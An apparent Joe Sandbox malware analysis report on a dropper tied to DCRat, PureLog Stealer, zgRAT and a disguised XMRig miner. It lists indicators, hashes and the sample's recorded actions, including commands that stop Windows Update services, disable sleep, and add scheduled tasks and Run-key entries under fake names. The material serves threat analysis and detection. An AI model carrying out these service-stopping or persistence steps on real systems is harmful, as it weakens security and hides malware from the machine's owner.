Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation

Source: C:\Windows\System32\dialer.exe

Code function: 20_2_00007FF62DC31C64 AllocateAndInitializeSid,SetEntriesInAclW,LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeW,

20_2_00007FF62DC31C64

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 3_2_0008DF1E GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,CloseHandle,

3_2_0008DF1E

Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe

Code function: 3_2_0007B146 GetVersionExW,

3_2_0007B146

Source: C:\Windows\SysWOW64\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Modifies power options to not sleep / hibernate

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -hibernate-timeout-ac 0	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\powercfg.exe powercfg /x -standby-timeout-ac 0	Jump to behavior

Stops critical windows services

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop UsoSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop WaaSMedicSvc
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop wuauserv
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop bits
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop dosvc

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 00000003.00000003.2396018621.000000000538E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\fontdriversavescrt\ComComponentDriverInto.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match

File source: C:\fontdriversavescrt\ComComponentDriverInto.exe, type: DROPPED

Remote Access Functionality

Yara detected PureLog Stealer

Source: Yara match	File source: 00000003.00000003.2396018621.000000000538E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\fontdriversavescrt\ComComponentDriverInto.exe, type: DROPPED

Yara detected zgRAT

Source: Yara match

File source: C:\fontdriversavescrt\ComComponentDriverInto.exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	1 Valid Accounts	2 Native API	1 Scripting	1 Abuse Elevation Control Mechanism	2 Disable or Modify Tools	1 Credential API Hooking	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	12 Command and Scripting Interpreter	11 DLL Side-Loading	11 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	1 Credential API Hooking	Junk Data	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Scheduled Task/Job	1 Valid Accounts	1 Valid Accounts	1 Abuse Elevation Control Mechanism	Security Account Manager	35 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Steganography	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	1 Service Execution	11 Windows Service	11 Access Token Manipulation	3 Obfuscated Files or Information	NTDS	221 Security Software Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	1 PowerShell	11 Scheduled Task/Job	11 Windows Service	1 Install Root Certificate	LSA Secrets	2 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	913 Process Injection	3 Software Packing	Cached Domain Credentials	21 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	11 Scheduled Task/Job	11 DLL Side-Loading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	4 Rootkit	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	22 Masquerading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	1 Valid Accounts	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Modify Registry	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking
Determine Physical Locations	Virtual Private Server	Compromise Hardware Supply Chain	Unix Shell	Systemd Timers	Systemd Timers	21 Virtualization/Sandbox Evasion	GUI Input Capture	Permission Groups Discovery	Replication Through Removable Media	Email Collection	Proxy	Exfiltration over USB	Network Denial of Service
Business Relationships	Server	Trusted Relationship	Visual Basic	Container Orchestration Job	Container Orchestration Job	11 Access Token Manipulation	Web Portal Capture	Local Groups	Component Object Model and Distributed COM	Local Email Collection	Internal Proxy	Commonly Used Port	Direct Network Flood
Identify Business Tempo	Botnet	Hardware Additions	Python	Hypervisor	Process Injection	913 Process Injection	Credential API Hooking	Domain Groups	Exploitation of Remote Services	Remote Email Collection	External Proxy	Transfer Data to Cloud Account	Reflection Amplification
Identify Roles	Web Services	Masquerade as Legitimate Application	JavaScript	Valid Accounts	Dynamic-link Library Injection	1 Hidden Files and Directories	Brute Force	Cloud Groups	Attack PC via USB Connection	Email Forwarding Rule	Multi-hop Proxy	Exfiltration Over Web Service	Endpoint Denial of Service

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
launcher.exe.bin.exe	88%	Virustotal		Browse
launcher.exe.bin.exe	97%	ReversingLabs	Win32.Exploit.PureLogStealer
launcher.exe.bin.exe	100%	Avira	TR/Dropper.Gen
launcher.exe.bin.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\fontdriversavescrt\mxUJuDSBL8uYxNL3S2me9mvpl9XOE7C7oXpLzzbyKUU0.vbe	100%	Avira	VBS/Runner.VPG
C:\fontdriversavescrt\ComComponentDriverInto.exe	100%	Avira	HEUR/AGEN.1323342
C:\Users\user\AppData\Local\Temp\ylbujkauzmzd.tmp	100%	Avira	HEUR/AGEN.1362795
C:\Windows\Temp\ylbujkauzmzd.tmp	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	100%	Joe Sandbox ML
C:\fontdriversavescrt\ComComponentDriverInto.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\hs.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\ylbujkauzmzd.tmp	100%	Joe Sandbox ML
C:\Program Files\Google\Chrome\updater.exe	87%	ReversingLabs	Win64.Trojan.Whisperer
C:\Program Files\Google\Libs\WR64.sys	5%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DCRatBuild.exe	51%	ReversingLabs	Win32.Trojan.Uztuby
C:\Users\user\AppData\Local\Temp\hs.exe	87%	ReversingLabs	Win64.Trojan.Whisperer
C:\Users\user\AppData\Local\Temp\launcher.exe	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\ylbujkauzmzd.tmp	92%	ReversingLabs	Win64.Trojan.Heracles
C:\Windows\Temp\ylbujkauzmzd.tmp	70%	ReversingLabs	Win64.Trojan.DisguisedXMRigMiner
C:\fontdriversavescrt\ComComponentDriverInto.exe	58%	ReversingLabs	ByteCode-MSIL.Trojan.DCRat

Source	Detection	Scanner	Label	Link
https://ion=v4.5	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	high
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	high
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000015.00000002.2521873775.000002AD164EF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/winsvr-2022-pshelp	powershell.exe, 00000015.00000002.2494798943.000002AD066A9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/07/securitypolicy	lsass.exe, 0000001C.00000002.3735303371.00000264CD02F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2461866703.00000264CD04E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3735755427.00000264CD04E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702	lsass.exe, 0000001C.00000002.3735303371.00000264CD02F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000015.00000002.2494798943.000002AD066A9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/09/policy	lsass.exe, 0000001C.00000002.3735303371.00000264CD02F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3734967113.00000264CD013000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000000.2461701963.00000264CD013000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/erties	lsass.exe, 0000001C.00000002.3735303371.00000264CD02F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/soap12/	lsass.exe, 0000001C.00000002.3735303371.00000264CD02F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 00000015.00000002.2494798943.000002AD066A9000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000015.00000002.2494798943.000002AD066A9000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ion=v4.5	powershell.exe, 00000015.00000002.2528079149.000002AD1E995000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 00000015.00000002.2494798943.000002AD066A9000.00000004.00000800.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3735303371.00000264CD02F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://contoso.com/	powershell.exe, 00000015.00000002.2521873775.000002AD164EF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://nuget.org/nuget.exe	powershell.exe, 00000015.00000002.2521873775.000002AD164EF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/License	powershell.exe, 00000015.00000002.2521873775.000002AD164EF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000015.00000002.2521873775.000002AD164EF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/wsdl/soap12/P	lsass.exe, 0000001C.00000002.3735303371.00000264CD02F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/trust	lsass.exe, 0000001C.00000002.3735303371.00000264CD02F000.00000004.00000001.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000015.00000002.2494798943.000002AD06481000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/ws-sx/ws-trust/200512	lsass.exe, 0000001C.00000000.2461866703.00000264CD04E000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 0000001C.00000002.3735755427.00000264CD04E000.00000004.00000001.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd	lsass.exe, 0000001C.00000002.3735303371.00000264CD02F000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000015.00000002.2494798943.000002AD06481000.00000004.00000800.00020000.00000000.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000015.00000002.2494798943.000002AD066A9000.00000004.00000800.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

⊘No contacted IP infos

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1587657
Start date and time:	2025-01-10 16:24:53 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 11m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	44
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	15
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	launcher.exe.bin.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mine.winEXE@79/108@0/0
EGA Information:	Successful, ratio: 88.9%
HCA Information:	Successful, ratio: 81% Number of executed functions: 173 Number of non-executed functions: 293
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): Conhost.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe, schtasks.exe
Excluded IPs from analysis (whitelisted): 199.232.210.172, 192.229.221.95, 4.175.87.197, 52.149.20.212, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ocsp.edge.digicert.com, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, pool.hashvault.pro, pastebin.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target hs.exe, PID 6768 because it is empty
Execution Graph export aborted for target powershell.exe, PID 5172 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:25:55	API Interceptor	1x Sleep call for process: hs.exe modified
10:25:58	API Interceptor	71x Sleep call for process: powershell.exe modified
10:26:13	API Interceptor	1x Sleep call for process: updater.exe modified
10:26:14	API Interceptor	1933x Sleep call for process: svchost.exe modified
10:26:36	API Interceptor	328946x Sleep call for process: winlogon.exe modified
10:26:37	API Interceptor	236871x Sleep call for process: lsass.exe modified
10:26:41	API Interceptor	309650x Sleep call for process: dwm.exe modified
10:26:54	API Interceptor	199x Sleep call for process: cmd.exe modified
10:26:54	API Interceptor	25x Sleep call for process: conhost.exe modified
10:26:54	API Interceptor	24x Sleep call for process: launcher.exe modified
16:26:08	Task Scheduler	Run new task: GoogleUpdateTaskMachineQC path: C:\Program Files\Google\Chrome\updater.exe
16:26:30	Task Scheduler	Run new task: explorer path: "C:\Users\Default\explorer.exe"
16:26:30	Task Scheduler	Run new task: explorere path: "C:\Users\Default\explorer.exe"
16:26:30	Task Scheduler	Run new task: launcher path: "C:\Recovery\launcher.exe"
16:26:30	Task Scheduler	Run new task: launcherl path: "C:\Recovery\launcher.exe"
16:26:32	Task Scheduler	Run new task: nuHgOHHpbRMTfX path: "C:\Windows\Panther\FastCleanup\nuHgOHHpbRMTfX.exe"
16:26:32	Task Scheduler	Run new task: nuHgOHHpbRMTfXn path: "C:\Windows\Panther\FastCleanup\nuHgOHHpbRMTfX.exe"
16:26:34	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run explorer "C:\Users\Default\explorer.exe"
16:26:36	Task Scheduler	Run new task: ApplicationFrameHost path: "C:\Users\All Users\ApplicationFrameHost.exe"
16:26:37	Task Scheduler	Run new task: ApplicationFrameHostA path: "C:\Users\All Users\ApplicationFrameHost.exe"
16:26:38	Task Scheduler	Run new task: ComComponentDriverInto path: "C:\fontdriversavescrt\ComComponentDriverInto.exe"
16:26:39	Task Scheduler	Run new task: ComComponentDriverIntoC path: "C:\fontdriversavescrt\ComComponentDriverInto.exe"
16:26:46	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run launcher "C:\Recovery\launcher.exe"
16:27:00	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run nuHgOHHpbRMTfX "C:\Windows\Panther\FastCleanup\nuHgOHHpbRMTfX.exe"
16:28:10	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ApplicationFrameHost "C:\Users\All Users\ApplicationFrameHost.exe"
16:28:19	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run ComComponentDriverInto "C:\fontdriversavescrt\ComComponentDriverInto.exe"

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
s-part-0017.t-0009.t-msedge.net	FGTFTj8GLM.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	30562134305434372.js	Get hash	malicious	Strela Downloader	Browse	13.107.246.45
	Mmm7GmDcR4.exe	Get hash	malicious	LummaC	Browse	13.107.246.45
	https://na4.docusign.net/Signing/EmailStart.aspx?a=ffa78034-d960-4bb3-b2a2-bb62a1fc4a65&etti=24&acct=86dab687-685e-40aa-af52-e5c3fc07b508&er=04714c6d-cc25-4a21-be91-01e1c43a5f3f	Get hash	malicious	HTMLPhisher	Browse	13.107.246.45
	hCkkM0lH0P.exe	Get hash	malicious	AgentTesla	Browse	13.107.246.45
	RSLMZxqebl.exe	Get hash	malicious	FormBook	Browse	13.107.246.45
	nRNzqQOQwk.exe	Get hash	malicious	GuLoader	Browse	13.107.246.45
	PO-0005082025 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	13.107.246.45
	PO-0005082025 pdf.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	13.107.246.45
	Shipping Document.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	13.107.246.45
bg.microsoft.map.fastly.net	10259286552329511027.js	Get hash	malicious	Strela Downloader	Browse	199.232.210.172
	30562134305434372.js	Get hash	malicious	Strela Downloader	Browse	199.232.210.172
	18559217651387524988.js	Get hash	malicious	Strela Downloader	Browse	199.232.210.172
	CF342114-CD27-4FDB-9984-9F03FED05312_12172024123959996.dll	Get hash	malicious	Unknown	Browse	199.232.214.172
	6994127092970513305.js	Get hash	malicious	Strela Downloader	Browse	199.232.214.172
	QUOTATION-9044456778.pdf (83kb).com.exe	Get hash	malicious	PureLog Stealer, Quasar	Browse	199.232.214.172
	Shipping Document.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	199.232.210.172
	3254519122657813770.js	Get hash	malicious	Strela Downloader	Browse	199.232.210.172
	1712226379134618467.js	Get hash	malicious	Strela Downloader	Browse	199.232.214.172
	7401990642713807.js	Get hash	malicious	Strela Downloader	Browse	199.232.214.172
fp2e7a.wpc.phicdn.net	Shipping Document.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	192.229.221.95
	https://marcuso-wq.github.io/home/	Get hash	malicious	HTMLPhisher	Browse	192.229.221.95
	1.png	Get hash	malicious	Unknown	Browse	192.229.221.95
	atomxml.ps1	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	192.229.221.95
	TR98760H.exe	Get hash	malicious	AgentTesla	Browse	192.229.221.95
	Payment-Order #24560274 for 8,380 USD.exe	Get hash	malicious	XWorm	Browse	192.229.221.95
	invoice-1623385214.pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	192.229.221.95
	PO#3311-20250108003.xls	Get hash	malicious	Unknown	Browse	192.229.221.95
	invoice-1623385214 pdf.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	192.229.221.95
	0a0#U00a0.js	Get hash	malicious	PureLog Stealer, RHADAMANTHYS, zgRAT	Browse	192.229.221.95

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Program Files\Google\Libs\WR64.sys	nW2oopMIdg.exe	Get hash	malicious	Xmrig	Browse
	gem2.exe	Get hash	malicious	Xmrig	Browse
	chrtrome22.exe	Get hash	malicious	Xmrig	Browse
	pTVKHqys2h.exe	Get hash	malicious	Xmrig	Browse
	174.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, XWorm, Xmrig	Browse
	47SXvEQ.exe	Get hash	malicious	Blank Grabber, Xmrig	Browse
	xmr new.exe	Get hash	malicious	Xmrig	Browse
	eth.exe	Get hash	malicious	Xmrig	Browse
	file.exe	Get hash	malicious	Xmrig	Browse

Created / dropped Files

C:\Program Files\Google\Chrome\updater.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\hs.exe
File Type:	PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Category:	dropped
Size (bytes):	6008408
Entropy (8bit):	7.677314958287387
Encrypted:	false
SSDEEP:	98304:EDBso67ytJ/clo+5tFKoWQ9+Zzt2GWSDcd3bh1OF+fC5XujafTZBi9MIvRsGA2de:cyoJX27TEzdnI1CDwag1sXrvt
MD5:	8E222E8F9A186F8D21BF2895E1946853
SHA1:	07B2087B8B9D2A2F3C23BF59286C21C6AEFBF19F
SHA-256:	9942C7CC38D9DBCB8BFB81D83A31671FA389409E0F8C4A02DB2DBE90E1669EE3
SHA-512:	6DFFAA9204D67B3A5A38441BF8C653B787A3AA3133A298CCBDECB97A4A7887F178A61030AC6D0BA66031A30BCE3DD209478C778ACBA3870D00FCAB6EBB3A4D79
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 87%
Preview:	MZ......................@.......................................hr......!..L.!This program cannot be run in DOS mode....$.......PE..d.....bg...............&......[..*.............@............................. \.....%G\...`... ...............................................[.4.....\. ....p[.......[.X&....\.0............................P[.(.....................[.P............................text...............................`..`.data... SY......TY.................@....rdata..PC... [..D....[.............@..@.pdata.......p[......H[.............@..@.xdata..<.....[......\[.............@..@.bss.....)....[..........................idata..4.....[......l[.............@....CRT....`.....[......x[.............@....tls..........[......z[.............@....rsrc... .....\......\|[.............@....reloc..0.....\.......[.............@..B........................................................................................................................................................................

C:\Program Files\Google\Libs\WR64.sys

Download File

Process:	C:\Program Files\Google\Chrome\updater.exe
File Type:	PE32+ executable (native) x86-64, for MS Windows
Category:	dropped
Size (bytes):	14544
Entropy (8bit):	6.2660301556221185
Encrypted:	false
SSDEEP:	192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5:	0C0195C48B6B8582FA6F6373032118DA
SHA1:	D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256:	11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512:	AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:	Filename: nW2oopMIdg.exe, Detection: malicious, Browse Filename: gem2.exe, Detection: malicious, Browse Filename: chrtrome22.exe, Detection: malicious, Browse Filename: pTVKHqys2h.exe, Detection: malicious, Browse Filename: 174.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 47SXvEQ.exe, Detection: malicious, Browse Filename: xmr new.exe, Detection: malicious, Browse Filename: eth.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.\|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..\|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
